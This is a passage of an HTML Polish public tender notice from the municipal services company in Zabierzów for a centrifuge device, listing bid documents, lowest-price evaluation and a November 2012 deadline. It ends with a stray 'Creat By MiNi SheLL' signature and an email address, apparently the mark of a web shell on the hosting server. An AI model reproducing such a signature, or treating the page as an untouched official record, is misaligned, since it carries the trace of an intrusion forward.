4.4 Karty katalogowe oferowanych urządzeń wraz ze szczegółowym opisem technicznym i specyfikacją materiałową (pełny opis budowy działania wirówki oraz wszystkie parametry techniczne) zgodnie z wymogami określonymi w rozdziale II SIWZ p.t.: Opis przedmiotu zamówienia;
4.5 Oświadczenie projektanta, że istniejący strop przejmie obciążenie i drgania od urządzenia;
4.6 Opis sposobu montażu urządzenia i umieszczenia go w docelowej lokalizacji;
4.7 Oświadczenie o zgodności z przepisami Unii Europejskiej dotyczącymi bezpieczeństwa urządzeń;
4.8 Wstępny rzeczowo-Finansowy Harmonogram Realizacji w układzie miesięcznym opracowany na podstawie informacji podanych w rozdziale II SIWZ p.t.: Opis przedmiotu zamówienia; - zał. nr 7
4.9 Załącznik nr 5 zatytułowany Podwykonawcy żądamy wskazania, jaką część zamówienia Wykonawca zamierza powierzyć podwykonawcom.
Jeżeli Wykonawca nie zamierza powierzyć zamówienia podwykonawcy, załącza załącznik nr 5 do oferty z adnotacją nie dotyczy.
4.10 Podpisany lub zaparafowany projekt umowy- zał. nr 8</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zabierzow.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PRZEDSIĘBIORSTWO USŁUG KOMUNALNYCH
32 - 080 ZABIERZÓW, UL.KOLEJOWA 38
TEL.285-36-70, FAX 285-36-71
e-mail: puk@pukzabierzow.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.11.2012 godzina 10:00, miejsce: PRZEDSIĘBIORSTWO USŁUG KOMUNALNYCH
32 - 080 ZABIERZÓW, UL.KOLEJOWA 38.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com